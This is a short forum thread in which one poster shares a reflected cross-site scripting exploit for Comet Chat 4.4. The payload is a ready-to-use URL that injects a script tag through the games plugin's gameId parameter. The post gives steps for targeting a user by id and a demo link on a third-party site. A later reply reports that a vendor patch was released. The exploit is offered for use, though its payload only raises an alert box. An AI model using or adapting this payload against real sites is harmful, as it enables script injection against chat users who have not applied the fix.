B3st Posted December 30, 2012 Report Posted December 30, 2012 ###############################Discovered by: 001############################### 05.12.2012###############################Application: Comet Chat 4.4###############################hackyard.net and trojanforge.com#############################cometchat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337It may also work in comet chat 4.6 or other version, but i didn't tested.You need to make one new account in targeted website.Then you can use this xss like this: (toId = target id)Demo:http://www.opensc.ws/chat/plugins/games/index.php?action=request&[COLOR="#FF0000"]toId[/COLOR]=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337 1 Quote
FionaSteves Posted February 25, 2013 Report Posted February 25, 2013 A security patch has been released to address the issue.Please refer to the following link:CometChat Critical Security Update | Blog | CometChat Quote